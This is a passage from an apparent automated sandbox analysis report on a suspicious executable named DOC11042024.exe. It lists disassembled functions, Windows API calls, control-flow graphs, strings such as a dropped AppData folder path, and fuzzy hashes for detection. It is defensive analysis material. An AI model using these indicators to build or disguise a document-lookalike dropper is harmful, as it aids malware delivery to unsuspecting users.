                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                              • String ID: {
                                                                              • API String ID: 590372296-366298937
                                                                              • Opcode ID: a659e0f8c7bce5681badd59c65a7522d6f2db5b90c9f5564277ea0d1ab4f22af
                                                                              • Instruction ID: 1ef62d541cf2f76c7d95ba2e9f400cea79786b12962f1b5b9149b1c12766da65
                                                                              • Opcode Fuzzy Hash: a659e0f8c7bce5681badd59c65a7522d6f2db5b90c9f5564277ea0d1ab4f22af
                                                                              • Instruction Fuzzy Hash: AFA14A70900208BFEB219F60DD89AAE3B79FB48355F00803AFA05BA1E0C7755D92DF59
                                                                              Function 00405EC4 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207stringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 413 405ec4-405ecf 414 405ed1-405ee0 413->414 415 405ee2-405ef8 413->415 414->415 416 406110-406116 415->416 417 405efe-405f0b 415->417 418 40611c-406127 416->418 419 405f1d-405f2a 416->419 417->416 420 405f11-405f18 417->420 421 406132-406133 418->421 422 406129-40612d call 405ea2 418->422 419->418 423 405f30-405f3c 419->423 420->416 422->421 424 405f42-405f7e 423->424 425 4060fd 423->425 427 405f84-405f8f GetVersion 424->427 428 40609e-4060a2 424->428 429 40610b-40610e 425->429 430 4060ff-406109 425->430 431 405f91-405f95 427->431 432 405fa9 427->432 433 4060a4-4060a8 428->433 434 4060d7-4060db 428->434 429->416 430->416 431->432 435 405f97-405f9b 431->435 438 405fb0-405fb7 432->438 436 4060b8-4060c5 call 405ea2 433->436 437 4060aa-4060b6 call 405de9 433->437 439 4060ea-4060fb lstrlenW 434->439 440 4060dd-4060e5 call 405ec4 434->440 435->432 441 405f9d-405fa1 435->441 451 4060ca-4060d3 436->451 437->451 443 405fb9-405fbb 438->443 444 405fbc-405fbe 438->444 439->416 440->439 441->432 447 405fa3-405fa7 441->447 443->444 449 405fc0-405fdd call 405d6f 444->449 450 405ffa-405ffd 444->450 447->438 459 405fe2-405fe6 449->459 452 40600d-406010 450->452 453 405fff-40600b GetSystemDirectoryW 450->453 451->439 455 4060d5 451->455 457 406012-406020 GetWindowsDirectoryW 452->457 458 40607b-40607d 452->458 456 40607f-406083 453->456 460 406096-40609c call 406136 455->460 456->460 463 406085-406089 456->463 457->458 458->456 462 406022-40602c 458->462 459->463 464 405fec-405ff5 call 405ec4 459->464 460->439 466 406046-40605c SHGetSpecialFolderLocation 462->466 467 40602e-406031 462->467 463->460 469 40608b-406091 lstrcatW 463->469 464->456 471 406077 466->471 472 40605e-406075 SHGetPathFromIDListW CoTaskMemFree 466->472 467->466 470 406033-40603a 467->470 469->460 474 406042-406044 470->474 471->458 472->456 472->471 474->456 474->466
                                                                              APIs
                                                                              • GetVersion.KERNEL32(00000000,Completed,?,0040518D,Completed,00000000,00000000,00000000), ref: 00405F87
                                                                              • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406005
                                                                              • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 00406018
                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406054
                                                                              • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406062
                                                                              • CoTaskMemFree.OLE32(?), ref: 0040606D
                                                                              • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406091
                                                                              • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,0040518D,Completed,00000000,00000000,00000000), ref: 004060EB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                              • String ID: rigges$$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                              • API String ID: 900638850-84522598
                                                                              • Opcode ID: f731f8a4d3c6b6348c6b6e6e443dd9dae7956a45be664b2abbff2f05c6191f17
                                                                              • Instruction ID: 605be8e6da54f4c58925a2f78d45bb94ffb3e1be9b8f8bd2f9690637c51749f3
                                                                              • Opcode Fuzzy Hash: f731f8a4d3c6b6348c6b6e6e443dd9dae7956a45be664b2abbff2f05c6191f17
                                                                              • Instruction Fuzzy Hash: EC612371A40505AAEB20CF25CC44AAF37A5EF54314F11C13BE542BA2D1D73D9A92CB9E
                                                                              Function 004064F7 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f580236a766455552873888b78e05c68bcf9aaf95ea4bf87bf53c54bc59333fe
                                                                              • Instruction ID: 78a91b0f1f4adf266f5c95a9e88afe478210b3de85181abf3a6e30a75b1d55f3
                                                                              • Opcode Fuzzy Hash: f580236a766455552873888b78e05c68bcf9aaf95ea4bf87bf53c54bc59333fe
                                                                              • Instruction Fuzzy Hash: 47F17571D00229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96CF44
                                                                              Function 004061E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A5B,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405751,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 004061F0
                                                                              • FindClose.KERNELBASE(00000000), ref: 004061FC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID: WB
                                                                              • API String ID: 2295610775-2854515933
                                                                              • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                              • Instruction ID: 8da2930a46d37e4a7604f052629edd4a27d238d6de8a80f9863296bed3e08c17
                                                                              • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                              • Instruction Fuzzy Hash: ABD012319580709BD6102B387D0C85B7A589B493707614BB6F437F23E0C7389C6586AD
                                                                              Function 0040620C Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,0040335F,00000008), ref: 0040621E
                                                                              • LoadLibraryA.KERNELBASE(?,?,00000020,0040335F,00000008), ref: 00406229
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040623A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                              • String ID:
                                                                              • API String ID: 310444273-0
                                                                              • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                              • Instruction ID: e57d1366724ec87ec330055c9f15167223d91cc6228b83f23ceb327cf4dc0c8d
                                                                              • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                              • Instruction Fuzzy Hash: 90E0CD36A08120A7C7115B249D4496773AC9FD9701305043DF505F6240C774FC1297A9
                                                                              Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213, xrefs: 004020F5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstance
                                                                              • String ID: C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213
                                                                              • API String ID: 542301482-2216720624
                                                                              • Opcode ID: bb776092b858711ba0e5d1da68f81997d2f94b71a391bce3ebd7e25295a46504
                                                                              • Instruction ID: 10455a5b80b749719a2a32d17afaf26bb6b60e5bb99cb9d50b878c7cb8450fc9
                                                                              • Opcode Fuzzy Hash: bb776092b858711ba0e5d1da68f81997d2f94b71a391bce3ebd7e25295a46504
                                                                              • Instruction Fuzzy Hash: 70415175A00105AFCB00DFA4CD88EAD7BB5EF48314F204569F906EB2D1CAB9DD41CB55
                                                                              Function 00402706 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402715
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: FileFindFirst
                                                                              • String ID:
                                                                              • API String ID: 1974802433-0
                                                                              • Opcode ID: d8c1f95b986e583fc1cf121e9a04cdb2c76c4f729282b3cd1a1018c5c45ddda8
                                                                              • Instruction ID: 8dbd27fb11e95d49d024c3de352d63adc0bdd1ce85e77c77ad08f6528aeb0517
                                                                              • Opcode Fuzzy Hash: d8c1f95b986e583fc1cf121e9a04cdb2c76c4f729282b3cd1a1018c5c45ddda8
                                                                              • Instruction Fuzzy Hash: 3EF0E275A00100EBC700EBA0D9489EEB378EF04314F6041B7E111F31D0D7B84A41CB2A
                                                                              Function 00403876 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216stringregistrylibraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 168 403876-40388e call 40620c 171 403890-4038a0 call 405de9 168->171 172 4038a2-4038d9 call 405d6f 168->172 181 4038fc-403925 call 403b4c call 405a12 171->181 177 4038f1-4038f7 lstrcatW 172->177 178 4038db-4038ec call 405d6f 172->178 177->181 178->177 186 4039b7-4039bf call 405a12 181->186 187 40392b-403930 181->187 193 4039c1-4039c8 call 405ec4 186->193 194 4039cd-4039f2 LoadImageW 186->194 187->186 188 403936-40395e call 405d6f 187->188 188->186 195 403960-403964 188->195 193->194 197 403a73-403a7b call 40140b 194->197 198 4039f4-403a24 RegisterClassW 194->198 199 403976-403982 lstrlenW 195->199 200 403966-403973 call 405937 195->200 211 403a85-403a90 call 403b4c 197->211 212 403a7d-403a80 197->212 201 403b42 198->201 202 403a2a-403a6e SystemParametersInfoW CreateWindowExW 198->202 206 403984-403992 lstrcmpiW 199->206 207 4039aa-4039b2 call 40590a call 405ea2 199->207 200->199 204 403b44-403b4b 201->204 202->197 206->207 210 403994-40399e GetFileAttributesW 206->210 207->186 214 4039a0-4039a2 210->214 215 4039a4-4039a5 call 405956 210->215 221 403a96-403ab3 ShowWindow LoadLibraryW 211->221 222 403b19-403b1a call 405229 211->222 212->204 214->207 214->215 215->207 223 403ab5-403aba LoadLibraryW 221->223 224 403abc-403ace GetClassInfoW 221->224 228 403b1f-403b21 222->228 223->224 226 403ad0-403ae0 GetClassInfoW RegisterClassW 224->226 227 403ae6-403b09 DialogBoxParamW call 40140b 224->227 226->227 233 403b0e-403b17 call 4037c6 227->233 230 403b23-403b29 228->230 231 403b3b-403b3d call 40140b 228->231 230->212 234 403b2f-403b36 call 40140b 230->234 231->201 233->204 234->212
                                                                              APIs
                                                                                • Part of subcall function 0040620C: GetModuleHandleA.KERNEL32(?,?,00000020,0040335F,00000008), ref: 0040621E
                                                                                • Part of subcall function 0040620C: LoadLibraryA.KERNELBASE(?,?,00000020,0040335F,00000008), ref: 00406229
                                                                                • Part of subcall function 0040620C: GetProcAddress.KERNEL32(00000000,?), ref: 0040623A
                                                                              • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,75923420,00000000,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 004038F7
                                                                              • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403977
                                                                              • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 0040398A
                                                                              • GetFileAttributesW.KERNEL32(: Completed), ref: 00403995
                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213), ref: 004039DE
                                                                                • Part of subcall function 00405DE9: wsprintfW.USER32 ref: 00405DF6
                                                                              • RegisterClassW.USER32(00428180), ref: 00403A1B
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A33
                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A68
                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403A9E
                                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AAF
                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00403ABA
                                                                              • GetClassInfoW.USER32(00000000,RichEdit20A,00428180), ref: 00403ACA
                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403AD7
                                                                              • RegisterClassW.USER32(00428180), ref: 00403AE0
                                                                              • DialogBoxParamW.USER32(?,00000000,00403C19,00000000), ref: 00403AFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: "C:\Users\user\Desktop\DOC11042024.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                              • API String ID: 914957316-470081751
                                                                              • Opcode ID: 92c2617766b14b4fb783ec7d86720af88888e609603086d5b27b07b453ff5edc
                                                                              • Instruction ID: 8dd1989e48c2adcd6a875d76624611d0fb53d122e5506f9fa3bc233a33b4a0d8
                                                                              • Opcode Fuzzy Hash: 92c2617766b14b4fb783ec7d86720af88888e609603086d5b27b07b453ff5edc
                                                                              • Instruction Fuzzy Hash: 1761C570604601BAE720AF669C46E3B3A6CEB84749F40453FF941B62E2DB785912CA6D
                                                                              Function 00403C19 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 239 403c19-403c2b 240 403c31-403c37 239->240 241 403d6c-403d7b 239->241 240->241 244 403c3d-403c46 240->244 242 403dca-403ddf 241->242 243 403d7d-403dc5 GetDlgItem * 2 call 4040f1 SetClassLongW call 40140b 241->243 246 403de1-403de4 242->246 247 403e1f-403e24 call 40413d 242->247 243->242 248 403c48-403c55 SetWindowPos 244->248 249 403c5b-403c5e 244->249 253 403de6-403df1 call 401389 246->253 254 403e17-403e19 246->254 261 403e29-403e44 247->261 248->249 250 403c60-403c72 ShowWindow 249->250 251 403c78-403c7e 249->251 250->251 256 403c80-403c95 DestroyWindow 251->256 257 403c9a-403c9d 251->257 253->254 275 403df3-403e12 SendMessageW 253->275 254->247 260 4040be 254->260 263 40409b-4040a1 256->263 265 403cb0-403cb6 257->265 266 403c9f-403cab SetWindowLongW 257->266 262 4040c0-4040c7 260->262 268 403e46-403e48 call 40140b 261->268 269 403e4d-403e53 261->269 263->260 276 4040a3-4040a9 263->276 273 403d59-403d67 call 404158 265->273 274 403cbc-403ccd GetDlgItem 265->274 266->262 268->269 271 403e59-403e64 269->271 272 40407c-404095 DestroyWindow EndDialog 269->272 271->272 278 403e6a-403eb7 call 405ec4 call 4040f1 * 3 GetDlgItem 271->278 272->263 273->262 279 403cec-403cef 274->279 280 403ccf-403ce6 SendMessageW IsWindowEnabled 274->280 275->262 276->260 277 4040ab-4040b4 ShowWindow 276->277 277->260 309 403ec1-403efd ShowWindow KiUserCallbackDispatcher call 404113 EnableWindow 278->309 310 403eb9-403ebe 278->310 283 403cf1-403cf2 279->283 284 403cf4-403cf7 279->284 280->260 280->279 287 403d22-403d27 call 4040ca 283->287 288 403d05-403d0a 284->288 289 403cf9-403cff 284->289 287->273 292 403d40-403d53 SendMessageW 288->292 294 403d0c-403d12 288->294 289->292 293 403d01-403d03 289->293 292->273 293->287 295 403d14-403d1a call 40140b 294->295 296 403d29-403d32 call 40140b 294->296 305 403d20 295->305 296->273 306 403d34-403d3e 296->306 305->287 306->305 313 403f02 309->313 314 403eff-403f00 309->314 310->309 315 403f04-403f32 GetSystemMenu EnableMenuItem SendMessageW 313->315 314->315 316 403f34-403f45 SendMessageW 315->316 317 403f47 315->317 318 403f4d-403f8b call 404126 call 405ea2 lstrlenW call 405ec4 SetWindowTextW call 401389 316->318 317->318 318->261 327 403f91-403f93 318->327 327->261 328 403f99-403f9d 327->328 329 403fbc-403fd0 DestroyWindow 328->329 330 403f9f-403fa5 328->330 329->263 332 403fd6-404003 CreateDialogParamW 329->332 330->260 331 403fab-403fb1 330->331 331->261 333 403fb7 331->333 332->263 334 404009-404060 call 4040f1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 332->334 333->260 334->260 339 404062-404075 ShowWindow call 40413d 334->339 341 40407a 339->341 341->263
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C55
                                                                              • ShowWindow.USER32(?), ref: 00403C72
                                                                              • DestroyWindow.USER32 ref: 00403C86
                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CA2
                                                                              • GetDlgItem.USER32(?,?), ref: 00403CC3
                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CD7
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403CDE
                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403D8C
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403D96
                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403DB0
                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E01
                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403EA7
                                                                              • ShowWindow.USER32(00000000,?), ref: 00403EC8
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EDA
                                                                              • EnableWindow.USER32(?,?), ref: 00403EF5
                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F0B
                                                                              • EnableMenuItem.USER32(00000000), ref: 00403F12
